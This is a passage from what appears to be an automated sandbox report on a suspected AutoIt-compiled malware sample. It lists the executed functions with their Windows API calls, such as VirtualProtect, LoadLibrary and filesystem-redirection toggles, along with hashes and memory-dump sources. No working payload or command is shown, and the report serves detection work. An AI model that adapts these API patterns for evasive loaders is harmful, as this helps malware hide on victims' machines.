Opcode Fuzzy Hash: 0803ef4439ec8bea52cd00fc473689ddececb4cc96e866101faaf8bec706c269
Instruction Fuzzy Hash: A921A871A002989FDF01DF98C945BDE7BFC9F49304F104059E405B7281DFB859898FA1

Function 00B12557 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 50COMMON

Download Yara Rule

APIs

__fread_nolock.LIBCMT ref: 00B12587

Strings

EA06, xrefs: 00B125B9

Memory Dump Source

Source File: 00000000.00000002.2066245950.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.2066225058.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066314596.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066314596.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066362082.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066379836.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_oagkiAhXgZ.jbxd

Similarity

API ID: __fread_nolock
String ID: EA06
API String ID: 2638373210-3962188686
Opcode ID: 918f04da0a775a877c578b6d5423f892c1bb212829f67503948ebc637b1d85b5
Instruction ID: fa2c6f4c1e6404344396a638957603a37e8cedfaa2b06432f9116c48c487781a
Opcode Fuzzy Hash: 918f04da0a775a877c578b6d5423f892c1bb212829f67503948ebc637b1d85b5
Instruction Fuzzy Hash: 0401B172944258BEDF28C7A8C856FEEBBF8DB15301F00459EE192D2181E5B8E6188B60

Function 017C4AE8 Relevance: 1.7, APIs: 1, Instructions: 173COMMON

Download Yara Rule

APIs

Part of subcall function 017C4358: GetFileAttributesW.KERNELBASE(?), ref: 017C4363

CreateDirectoryW.KERNELBASE(?,00000000), ref: 017C4C5F

Memory Dump Source

Source File: 00000000.00000002.2067721187.00000000017C3000.00000040.00000020.00020000.00000000.sdmp, Offset: 017C3000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_17c3000_oagkiAhXgZ.jbxd

Similarity

API ID: AttributesCreateDirectoryFile
String ID:
API String ID: 3401506121-0
Opcode ID: 80201d5cac7443383098dc845ef8fe9a8e5c0fe013b506a2998ac35305411d97
Instruction ID: dad68c1f25e6113e0bec8aefad823daa251916657be10e38b52632d1b106d252
Opcode Fuzzy Hash: 80201d5cac7443383098dc845ef8fe9a8e5c0fe013b506a2998ac35305411d97
Instruction Fuzzy Hash: 2061A331A1020D96EF14EFB0D854BEFB33AEF58700F00556DA60DEB290EB759A49CB65

Function 00ABFC70 Relevance: 1.6, APIs: 1, Instructions: 94memoryCOMMON

Download Yara Rule

APIs

VirtualProtect.KERNELBASE ref: 00ABFD1F

Memory Dump Source

Source File: 00000000.00000002.2066245950.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.2066225058.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066314596.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066314596.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066362082.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066379836.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_oagkiAhXgZ.jbxd

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
Instruction ID: f7cf4c0e8a82f5c67458d0953ad8326780d133e518f8cfcf0aa214bd9f28af50
Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
Instruction Fuzzy Hash: DE31D375A00109DFC718CF59D880AA9FBB9FF4A304B2886A5E809CB656D731EDC1DBC0

Function 00AA4ECB Relevance: 1.6, APIs: 1, Instructions: 65libraryCOMMON

Download Yara Rule

APIs

Part of subcall function 00AA4E90: LoadLibraryA.KERNEL32(kernel32.dll,?,?,00AA4EDD,?,00B71418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00AA4E9C
Part of subcall function 00AA4E90: GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 00AA4EAE
Part of subcall function 00AA4E90: FreeLibrary.KERNEL32(00000000,?,?,00AA4EDD,?,00B71418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00AA4EC0

LoadLibraryExW.KERNEL32(?,00000000,00000002,?,00B71418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00AA4EFD

Part of subcall function 00AA4E59: LoadLibraryA.KERNEL32(kernel32.dll,?,?,00AE3CDE,?,00B71418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00AA4E62
Part of subcall function 00AA4E59: GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00AA4E74
Part of subcall function 00AA4E59: FreeLibrary.KERNEL32(00000000,?,?,00AE3CDE,?,00B71418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00AA4E87

Memory Dump Source

Source File: 00000000.00000002.2066245950.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.2066225058.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066314596.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066314596.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066362082.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066379836.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_oagkiAhXgZ.jbxd

Similarity

API ID: Library$Load$AddressFreeProc
String ID:
API String ID: 2632591731-0
Opcode ID: f63a4bb7e9e0fdba085bb8ff09691261110ae45a6d37ac392fd5d8a9c6b5d4a9
Instruction ID: a011fd08c387246729e229da90b94917d1b68460519b128888edc472467c7642
Opcode Fuzzy Hash: f63a4bb7e9e0fdba085bb8ff09691261110ae45a6d37ac392fd5d8a9c6b5d4a9
Instruction Fuzzy Hash: 5D11C432610205AECF24EB60DE06FAD77A59F89B10F20442DF552A71D1EFB0AA459750

Function 00AD8402 Relevance: 1.6, APIs: 1, Instructions: 54COMMON

Download Yara Rule

APIs

__wsopen_s.LIBCMT ref: 00AD8440

Memory Dump Source

Source File: 00000000.00000002.2066245950.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.2066225058.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066314596.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066314596.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066362082.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066379836.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_oagkiAhXgZ.jbxd

Similarity

API ID: __wsopen_s
String ID:
API String ID: 3347428461-0
Opcode ID: 2904d9ab450cf35374a0b7ce9bbee8bb7bfcb6f6ad0fd2bfc8c2394e5235def5
Instruction ID: 512ed111cadafb47f1db1dd8d4e36807a919b9cb760d1b07d081b143d4dc10b7
Opcode Fuzzy Hash: 2904d9ab450cf35374a0b7ce9bbee8bb7bfcb6f6ad0fd2bfc8c2394e5235def5
Instruction Fuzzy Hash: 7C1118B590410AAFCB05DF58E941A9B7BF5FF48314F10405AF809AB312DB31EA11CBA5

Function 00AD5000 Relevance: 1.6, APIs: 1, Instructions: 52COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00AD4C7D: RtlAllocateHeap.NTDLL(00000008,00AA1129,00000000,?,00AD2E29,00000001,00000364,?,?,?,00ACF2DE,00AD3863,00B71444,?,00ABFDF5,?), ref: 00AD4CBE

_free.LIBCMT ref: 00AD506C

Memory Dump Source

Source File: 00000000.00000002.2066245950.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.2066225058.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066314596.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066314596.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066362082.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066379836.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_oagkiAhXgZ.jbxd

Similarity

API ID: AllocateHeap_free
String ID:
API String ID: 614378929-0
Opcode ID: 9ba45ce058d1080761d5af908226540236078fd1fc19e2e0238d0ad147f07c6e
Instruction ID: ace1fd19c36672916289d1f3497af005be5610ea35cd03c9d0b7fd276f115f70
Opcode Fuzzy Hash: 9ba45ce058d1080761d5af908226540236078fd1fc19e2e0238d0ad147f07c6e
Instruction Fuzzy Hash: 3E0149726047046FE3318F65D881A5AFBECFB89370F25052EE195833C0EA30A905C7B4

Function 00ACE602 Relevance: 1.5, APIs: 1, Instructions: 46COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2066245950.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.2066225058.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066314596.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066314596.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066362082.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066379836.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_oagkiAhXgZ.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d6c69ec2a70ac845cc05b5f137181c3f07394ab8b33ef369e8c7ef627d5c9574
Instruction ID: 1f7b490ba3b0063032b5f82e03b915a5691d48fff2b89119b367ca7ff1b3f61a
Opcode Fuzzy Hash: d6c69ec2a70ac845cc05b5f137181c3f07394ab8b33ef369e8c7ef627d5c9574
Instruction Fuzzy Hash: 8CF02836521A109BDB317B798E05F5A339D9F62330F12072EF422933D2DB74E801C6A5

Function 00AD4C7D Relevance: 1.5, APIs: 1, Instructions: 39memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00000008,00AA1129,00000000,?,00AD2E29,00000001,00000364,?,?,?,00ACF2DE,00AD3863,00B71444,?,00ABFDF5,?), ref: 00AD4CBE

Memory Dump Source

Source File: 00000000.00000002.2066245950.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.2066225058.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066314596.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066314596.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066362082.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066379836.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_oagkiAhXgZ.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: e5acffb16ad0fc1674fc8cd5884b1a9c3809ffb640bca531fe67399ada1bfdb2
Instruction ID: 48b112820dca905fd163365bd14f52b86c477a2bb86deb8ece5940bdbdbcf06d
Opcode Fuzzy Hash: e5acffb16ad0fc1674fc8cd5884b1a9c3809ffb640bca531fe67399ada1bfdb2
Instruction Fuzzy Hash: 86F0593122732067DB201F629D09F5A3798BF487A0B164117F80BBB380CF30D80082E0

Function 00ADFDC4 Relevance: 1.5, APIs: 1, Instructions: 35COMMON

Download Yara Rule

APIs

Part of subcall function 00AD3820: RtlAllocateHeap.NTDLL(00000000,?,00B71444,?,00ABFDF5,?,?,00AAA976,00000010,00B71440,00AA13FC,?,00AA13C6,?,00AA1129), ref: 00AD3852

_free.LIBCMT ref: 00ADFDE4

Part of subcall function 00AD29C8: RtlFreeHeap.NTDLL(00000000,00000000,?,00ADD7D1,00000000,00000000,00000000,00000000,?,00ADD7F8,00000000,00000007,00000000,?,00ADDBF5,00000000), ref: 00AD29DE
Part of subcall function 00AD29C8: GetLastError.KERNEL32(00000000,?,00ADD7D1,00000000,00000000,00000000,00000000,?,00ADD7F8,00000000,00000007,00000000,?,00ADDBF5,00000000,00000000), ref: 00AD29F0

Memory Dump Source

Source File: 00000000.00000002.2066245950.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.2066225058.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066314596.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066314596.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066362082.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066379836.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_oagkiAhXgZ.jbxd

Similarity

API ID: Heap$AllocateErrorFreeLast_free
String ID:
API String ID: 314386986-0
Opcode ID: 0a556b694acb69d6588d53ab24fdc341e3f31c7a2bdf25161661ea63b318bdc5
Instruction ID: 8f6ecbe94b67b72d65082225d5aafbfb1933742cbaac8065a5963bf22cd52994
Opcode Fuzzy Hash: 0a556b694acb69d6588d53ab24fdc341e3f31c7a2bdf25161661ea63b318bdc5
Instruction Fuzzy Hash: 2DF06DB20057008FE7249F10D941B52B7F8EB04725F20892FE29B87B91CBB4B944CB94

Function 00AD3820 Relevance: 1.5, APIs: 1, Instructions: 32memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00000000,?,00B71444,?,00ABFDF5,?,?,00AAA976,00000010,00B71440,00AA13FC,?,00AA13C6,?,00AA1129), ref: 00AD3852

Memory Dump Source

Source File: 00000000.00000002.2066245950.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.2066225058.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066314596.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066314596.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066362082.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066379836.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_oagkiAhXgZ.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 02a59980d54daa772649952d26e59eb9939b4fd1aaa02a15ec1b535c4ddf1b9f
Instruction ID: d95c1bf2f30061fdba0e9581b43327a6ab11306040d0b2b272a16afe34cf05cd
Opcode Fuzzy Hash: 02a59980d54daa772649952d26e59eb9939b4fd1aaa02a15ec1b535c4ddf1b9f
Instruction Fuzzy Hash: A2E0E53310232466DE212B779D00F9E3A5AAB427B0F1A0026BC16A7680CB50DD01A2E6

Function 00AA4F39 Relevance: 1.5, APIs: 1, Instructions: 28COMMON

Download Yara Rule

APIs

FreeLibrary.KERNEL32(?,?,00B71418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00AA4F6D

Memory Dump Source

Source File: 00000000.00000002.2066245950.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.2066225058.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066314596.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066314596.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066362082.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066379836.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_oagkiAhXgZ.jbxd

Similarity

API ID: FreeLibrary
String ID:
API String ID: 3664257935-0
Opcode ID: b21d1f4d7f972cd7d703c084018872541c78c84dabbfdc98caa93117885680c7
Instruction ID: 0af576f77ab49cb0ca65c8fad3febba864abec81fe9a77e4b9dab050167ed0b0
Opcode Fuzzy Hash: b21d1f4d7f972cd7d703c084018872541c78c84dabbfdc98caa93117885680c7
Instruction Fuzzy Hash: 58F0A971105742CFDB348F60D49082ABBF0AF4A729320997EF1EA83660CBB19844EF00

Function 00AA2DA5 Relevance: 1.5, APIs: 1, Instructions: 23COMMON

Download Yara Rule

APIs

GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 00AA2DC4

Part of subcall function 00AA6B57: _wcslen.LIBCMT ref: 00AA6B6A

Memory Dump Source

Source File: 00000000.00000002.2066245950.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.2066225058.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066314596.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066314596.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066362082.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066379836.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_oagkiAhXgZ.jbxd

Similarity

API ID: LongNamePath_wcslen
String ID:
API String ID: 541455249-0
Opcode ID: 0304fb3f1243d61acbcbbb5ef5c30d29157a5944f4d36d6b90d5663dd75f4aa7
Instruction ID: 0f12487396f2dd49e446c5e2068aa6609beacb7d7ccfa67f12f92c9c3834ed18
Opcode Fuzzy Hash: 0304fb3f1243d61acbcbbb5ef5c30d29157a5944f4d36d6b90d5663dd75f4aa7
Instruction Fuzzy Hash: ACE0CD726001345BC711A6989D05FDE77DDDFC8790F040075FD09E7248DA70AD808690

Function 00B12693 Relevance: 1.5, APIs: 1, Instructions: 22COMMON

Download Yara Rule

APIs

__fread_nolock.LIBCMT ref: 00B126B5

Memory Dump Source

Source File: 00000000.00000002.2066245950.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.2066225058.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066314596.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066314596.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066362082.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066379836.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_oagkiAhXgZ.jbxd

Similarity

API ID: __fread_nolock
String ID:
API String ID: 2638373210-0
Opcode ID: 62c4ae1466583100269b95fce18df2779376e23d7999e61a0ae1b5108404e028
Instruction ID: 01e20f1c79c26f656a4e70b6642a1e9b55d44abafbcce845997ef510fe97fe22
Opcode Fuzzy Hash: 62c4ae1466583100269b95fce18df2779376e23d7999e61a0ae1b5108404e028
Instruction Fuzzy Hash: 25E04FB1609B005FDF399B28A951BF677E8DF49300F00086EF69B82352E57268958A4D

Function 00AA2B3D Relevance: 1.5, APIs: 1, Instructions: 22COMMON

Download Yara Rule

APIs

Part of subcall function 00AA3837: Shell_NotifyIconW.SHELL32(00000000,?), ref: 00AA3908

Part of subcall function 00AAD730: GetInputState.USER32 ref: 00AAD807

SetCurrentDirectoryW.KERNEL32(?), ref: 00AA2B6B

Part of subcall function 00AA30F2: Shell_NotifyIconW.SHELL32(00000002,?), ref: 00AA314E

Memory Dump Source

Source File: 00000000.00000002.2066245950.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.2066225058.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066314596.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066314596.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066362082.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066379836.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_oagkiAhXgZ.jbxd

Similarity

API ID: IconNotifyShell_$CurrentDirectoryInputState
String ID:
API String ID: 3667716007-0
Opcode ID: 5b81433ea82f4931cea7892f28a777a274267a1d1674c3e63fbee0a7920df2a2
Instruction ID: 09f06f76b701bfd95d8532b54dfd5957c4a7cd491054203a4d25a23fde954852
Opcode Fuzzy Hash: 5b81433ea82f4931cea7892f28a777a274267a1d1674c3e63fbee0a7920df2a2
Instruction Fuzzy Hash: 9DE0262330020407CA08BB78A91257DA7498BD7351F00087EF147432E2CF2445454322

Function 017C4358 Relevance: 1.5, APIs: 1, Instructions: 20COMMON

Download Yara Rule

APIs

GetFileAttributesW.KERNELBASE(?), ref: 017C4363

Memory Dump Source

Source File: 00000000.00000002.2067721187.00000000017C3000.00000040.00000020.00020000.00000000.sdmp, Offset: 017C3000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_17c3000_oagkiAhXgZ.jbxd

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: 195c23eedc4a89e51baf60bc3cc3d10d01908f8b29aed20e491e172ce03d4d2a
Instruction ID: 0357af84f52a72586ae02f1fe071a96b15c334ed9ca64ec96107235b2fb11724
Opcode Fuzzy Hash: 195c23eedc4a89e51baf60bc3cc3d10d01908f8b29aed20e491e172ce03d4d2a
Instruction Fuzzy Hash: CCE0C23090520CEBDB10CBBCCD14AADF3ACEB45720F004A9EE917E76C0E6308A40D794

Function 00AE039A Relevance: 1.5, APIs: 1, Instructions: 15fileCOMMONLIBRARYCODE

Download Yara Rule

APIs

CreateFileW.KERNELBASE(00000000,00000000,?,00AE0704,?,?,00000000,?,00AE0704,00000000,0000000C), ref: 00AE03B7

Memory Dump Source

Source File: 00000000.00000002.2066245950.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.2066225058.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066314596.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066314596.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066362082.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066379836.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_oagkiAhXgZ.jbxd

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 908829b0fb1578d54401bbf33ee1720c5b4b01424c425976315b94ec59f1af7c
Instruction ID: f845c86e8c1934b12e96035688e35e3916f09f8a69d03b5201df9c8c3128ef4b
Opcode Fuzzy Hash: 908829b0fb1578d54401bbf33ee1720c5b4b01424c425976315b94ec59f1af7c
Instruction Fuzzy Hash: 07D06C3204010DBBDF028F84DD06EDA3FAAFB48714F114000BE1866020C732E821AB90

Function 017C4328 Relevance: 1.5, APIs: 1, Instructions: 15COMMON

Download Yara Rule

APIs

GetFileAttributesW.KERNELBASE(?), ref: 017C4333

Memory Dump Source

Source File: 00000000.00000002.2067721187.00000000017C3000.00000040.00000020.00020000.00000000.sdmp, Offset: 017C3000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_17c3000_oagkiAhXgZ.jbxd

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: 63700976fb5b8646ca9f82f7877e0f33cef2a649cb81b4b88ad66ba6039b9afc
Instruction ID: 7eb4f64ee3b2d67842d89de1a1ded92068c154bb404b6604ad417f178aca760d
Opcode Fuzzy Hash: 63700976fb5b8646ca9f82f7877e0f33cef2a649cb81b4b88ad66ba6039b9afc
Instruction Fuzzy Hash: C5D0A73090520CEBCB10CFB89D049DDB7A8D705321F00475CFD16D7280D5319A009750

Function 00AA1CAD Relevance: 1.5, APIs: 1, Instructions: 8COMMON

Download Yara Rule

APIs

SystemParametersInfoW.USER32(00002001,00000000,00000002), ref: 00AA1CBC

Memory Dump Source

Source File: 00000000.00000002.2066245950.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.2066225058.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066314596.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066314596.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066362082.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066379836.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_oagkiAhXgZ.jbxd

Similarity

API ID: InfoParametersSystem
String ID:
API String ID: 3098949447-0
Opcode ID: 01e04103b0430eb3caf0b9a53bff138f0434bec4598adbbc6bf810ef060ad66e
Instruction ID: 8720f885e7cd71d50e61e5c20b9157f88388f31130a3ee6091befd761ad90927
Opcode Fuzzy Hash: 01e04103b0430eb3caf0b9a53bff138f0434bec4598adbbc6bf810ef060ad66e
Instruction Fuzzy Hash: A4C09B36280304EFF31447D4BC4BF147754A358B00F154401F64D675E3CBA11450D764

Function 017C5D54 Relevance: 1.3, APIs: 1, Instructions: 21sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNELBASE(000001F4), ref: 017C5D69

Memory Dump Source

Source File: 00000000.00000002.2067721187.00000000017C3000.00000040.00000020.00020000.00000000.sdmp, Offset: 017C3000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_17c3000_oagkiAhXgZ.jbxd

Similarity

API ID: Sleep
String ID:
API String ID: 3472027048-0
Opcode ID: 647f186050b41918f79179839cbc1a488579cc5f77474145a25b6e124dddc6ea
Instruction ID: cf752d3b636df2cf07c6cbb63a7d333fbd29c487574f3368e6d9e3be057c2c70
Opcode Fuzzy Hash: 647f186050b41918f79179839cbc1a488579cc5f77474145a25b6e124dddc6ea
Instruction Fuzzy Hash: ACE0BF7494020DEFDB00DFA4D54D6DD7BB4EF04702F1006A5FD05D7681DB319E548A62

Function 017C5D58 Relevance: 1.3, APIs: 1, Instructions: 18sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNELBASE(000001F4), ref: 017C5D69

Memory Dump Source

Source File: 00000000.00000002.2067721187.00000000017C3000.00000040.00000020.00020000.00000000.sdmp, Offset: 017C3000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_17c3000_oagkiAhXgZ.jbxd

Similarity

API ID: Sleep
String ID:
API String ID: 3472027048-0
Opcode ID: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
Instruction ID: 658303923f47a1c43ced5425151ace37752a2b04618838ee505915f3556ad79c
Opcode Fuzzy Hash: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
Instruction Fuzzy Hash: 5AE0E67494020DDFDB00DFB4D54D69D7BB4EF04702F100265FD01D2281D6319D508A62

Non-executed Functions

Function 00B39576 Relevance: 72.4, APIs: 39, Strings: 2, Instructions: 625windowkeyboardCOMMON

Download Yara Rule

APIs

Part of subcall function 00AB9BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00AB9BB2

DefDlgProcW.USER32(?,0000004E,?,?,?,?,?,?), ref: 00B3961A
SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 00B3965B
